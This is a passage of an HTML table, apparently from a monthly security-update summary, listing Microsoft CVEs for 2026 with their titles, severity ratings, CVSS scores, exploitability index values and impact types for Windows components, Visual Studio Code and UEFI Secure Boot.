 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45656"><span>CVE-2026-45656</span></a></td>
  <td width="256" class="xl68">UEFI Secure Boot
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-8863"><span>CVE-2026-8863</span></a></td>
  <td width="256" class="xl68">UEFI Secure Boot
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40376"><span>CVE-2026-40376</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47281"><span>CVE-2026-47281</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47284"><span>CVE-2026-47284</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47292"><span>CVE-2026-47292</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  MSSQL Extension Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48569"><span>CVE-2026-48569</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47287"><span>CVE-2026-47287</span></a></td>
  <td width="256" class="xl68">Visual Studio Code
  Tampering Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42829"><span>CVE-2026-42829</span></a></td>
  <td width="256" class="xl68">Windows Administrator
  Protection Secure Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70"></td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-34335"><span>CVE-2026-34335</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45601"><span>CVE-2026-45601</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45598"><span>CVE-2026-45598</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45596"><span>CVE-2026-45596</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45638"><span>CVE-2026-45638</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45603"><span>CVE-2026-45603</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42911"><span>CVE-2026-42911</span></a></td>
  <td width="256" class="xl68">Windows Ancillary
  Function Driver for WinSock Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45594"><span>CVE-2026-45594</span></a></td>
  <td width="256" class="xl68">Windows Application
  Identity (AppID) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45655"><span>CVE-2026-45655</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45658"><span>CVE-2026-45658</span></a></td>
  <td width="256" class="xl68">Windows BitLocker
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45640"><span>CVE-2026-45640</span></a></td>
  <td width="256" class="xl68">Windows Bluetooth Port
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45605"><span>CVE-2026-45605</span></a></td>
  <td width="256" class="xl68">Windows Bluetooth
  Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47656"><span>CVE-2026-47656</span></a></td>
  <td width="256" class="xl68">Windows Boot Manager
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44809"><span>CVE-2026-44809</span></a></td>
  <td width="256" class="xl68">Windows Common Log
  File System Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45634"><span>CVE-2026-45634</span></a></td>
  <td width="256" class="xl68">Windows DHCP Client
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45608"><span>CVE-2026-45608</span></a></td>
  <td width="256" class="xl68">Windows DHCP Client
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41108"><span>CVE-2026-41108</span></a></td>
  <td width="256" class="xl68">Windows DNS Client
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42905"><span>CVE-2026-42905</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44811"><span>CVE-2026-44811</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44808"><span>CVE-2026-44808</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44807"><span>CVE-2026-44807</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42983"><span>CVE-2026-42983</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44802"><span>CVE-2026-44802</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44813"><span>CVE-2026-44813</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44804"><span>CVE-2026-44804</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48566"><span>CVE-2026-48566</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44814"><span>CVE-2026-44814</span></a></td>
  <td width="256" class="xl68">Windows DWM Core
  Library Information Disclosure<span> 
  </span>Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45602"><span>CVE-2026-45602</span></a></td>
  <td width="256" class="xl68">Windows Dynamic Host
  Configuration Protocol (DHCP) Tampering Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42836"><span>CVE-2026-42836</span></a></td>
  <td width="256" class="xl68">Windows Function
  Discovery Service (fdwsd.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42910"><span>CVE-2026-42910</span></a></td>
  <td width="256" class="xl68">Windows Hotpatch
  Monitoring Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42972"><span>CVE-2026-42972</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45592"><span>CVE-2026-45592</span></a></td>
  <td width="256" class="xl68">Windows Internet
  (wininet.dll) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42903"><span>CVE-2026-42903</span></a></td>
  <td width="256" class="xl68">Windows Kerberos
  Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42914"><span>CVE-2026-42914</span></a></td>
  <td width="256" class="xl68">Windows Kerberos
  Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48583"><span>CVE-2026-48583</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45653"><span>CVE-2026-45653</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42984"><span>CVE-2026-42984</span></a></td>
  <td width="256" class="xl68">Windows Kernel
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45600"><span>CVE-2026-45600</span></a></td>
  <td width="256" class="xl68">Windows Kernel-Mode
  Driver Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45604"><span>CVE-2026-45604</span></a></td>
  <td width="256" class="xl68">Windows Managed
  Installer Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45595"><span>CVE-2026-45595</span></a></td>
  <td width="256" class="xl68">Windows Mark of the
  Web Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45636"><span>CVE-2026-45636</span></a></td>
  <td width="256" class="xl68">Windows NTFS Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-50508"><span>CVE-2026-50508</span></a></td>
  <td width="256" class="xl68">Windows NTLM Spoofing
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48565"><span>CVE-2026-48565</span></a></td>
  <td width="256" class="xl68">Windows Narrator
  Braille Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44805"><span>CVE-2026-44805</span></a></td>
  <td width="256" class="xl68">Windows Network
  Controller (NC) Host Agent Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42981"><span>CVE-2026-42981</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42974"><span>CVE-2026-42974</span></a></td>
  <td width="256" class="xl68">Windows Performance
  Monitor Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45487"><span>CVE-2026-45487</span></a></td>
  <td width="256" class="xl68">Windows Program
  Compatibility Assistant Service Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42828"><span>CVE-2026-42828</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42837"><span>CVE-2026-42837</span></a></td>
  <td width="256" class="xl68">Windows Projected File
  System Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42969"><span>CVE-2026-42969</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42971"><span>CVE-2026-42971</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42970"><span>CVE-2026-42970</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42973"><span>CVE-2026-42973</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notification Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42978"><span>CVE-2026-42978</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42977"><span>CVE-2026-42977</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42979"><span>CVE-2026-42979</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42991"><span>CVE-2026-42991</span></a></td>
  <td width="256" class="xl68">Windows Push
  Notifications Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45639"><span>CVE-2026-45639</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42908"><span>CVE-2026-42908</span></a></td>
  <td width="256" class="xl68">Windows Remote Desktop
  Protocol (RDP) Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45593"><span>CVE-2026-45593</span></a></td>
